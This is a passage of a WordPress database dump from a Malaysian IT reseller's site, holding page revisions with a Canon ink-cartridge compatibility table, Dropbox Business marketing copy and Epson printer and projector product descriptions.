Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-24 11:21:25','2018-12-24 03:21:25','',1449,'https://bintara.com.my/blog/2018/12/24/1449-revision-v1/',0,'revision','',0),(3433,1,'2019-09-25 16:06:41','2019-09-25 08:06:41','<img class=\"alignnone wp-image-1891\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/download.png\" alt=\"\" width=\"475\" height=\"57\" />\r\n\r\n&nbsp;\r\n<h2 class=\"c43-page-header-level-3-plank__headline\">Small business solutions</h2>\r\n<div class=\"c43-page-header-level-3-plank__text\">\r\n\r\nEvery business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Small but mighty businesses run on Dropbox</h3>\r\n<div class=\"c01-section-heading-plank__subheadline plank-text\">\r\n\r\nWhatever the size, Dropbox Business is helping these businesses bring new ideas to the world and find new ways of working together to achieve mighty things.\r\n\r\n</div>\r\n</div>\r\n\r\n<hr />\r\n\r\n<h3>Features</h3>\r\n<strong>Flexible storage plans</strong>\r\n\r\nChoose the right plan to ensure your team has the space it needs to be productive.\r\n\r\n<strong>File and version recovery</strong>\r\n\r\nEasily recover deleted files and restore previous file versions.\r\n\r\n<strong>Team folder manager</strong>\r\n\r\nGet visibility and control over team folders, including sync management.\r\n\r\n<strong>Link permissions</strong>\r\n\r\nPassword-protect your links, disable downloads, or set expiration dates to grant temporary access.\r\n\r\n<strong>Dropbox Paper</strong>\r\n\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\n\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\n\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\n\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\n\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\n\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\n\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\n\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n<h3 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h3>\r\n<h4 class=\"a23-media-block__title\">File backup</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n<h4 class=\"a23-media-block__title\">Team collaboration</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nStay productive with new ways to easily share work and collect feedback.\r\n<h4 class=\"a23-media-block__title\">Administrative tools</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nTeam management stays simple from a central location, the admin console.\r\n<h4 class=\"a23-media-block__title\">Security features</h4>\r\n<div class=\"a23-media-block__description\">\r\n\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Dropbox','','inherit','closed','closed','','1473-revision-v1','','','2019-09-25 16:06:41','2019-09-25 08:06:41','',1473,'https://bintara.com.my/blog/2019/09/25/1473-revision-v1/',0,'revision','',0),(2748,1,'2018-12-24 12:38:58','2018-12-24 04:38:58','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h3>Printers for Work</h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h3>BUSINESS INKJET PRINTER</h3>		\n		<p>Epson WorkForce Enterprise WF-C17590Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul><p>Epson WorkForce Pro WF-C5290Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><p>Epson WorkForce WF-100Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul><p>Epson WorkForce WF-7711Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>		\n			<h3>INK TANK SYSTEM</h3>		\n		<p>Epson EcoTank L3150Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><p>Epson L120 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul><p>Epson M1100 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n			<h3>LASER PRINTER</h3>		\n		<p>Epson AcuLaser C9300NÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul><p>Â Epson WorkForce AL-M320DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul><p>Epson WorkForce AL-M8100DNÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>		\n			<h3>POS PRINTER</h3>		\n		<p>Epson TM-H6000IVÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><p>Epson TM-T88V-iÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul><p>Epson TM-T70IIÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>		\n			<h3>PHOTO PRINTER</h3>		\n		<p>Epson L1800 A3 Photo Ink Tank Printer</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul><p>Epson L850 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul><p>Â </p><p>Epson L805 PrinterÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p>Epson EB-2055<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul><p>Epson EB-2142WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul><p>Epson EB-L500WÂ <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul><h3>ACCENT LIGHTING LASER PROJECTORS</h3><p>Epson LightScene EV-105</p><p><img 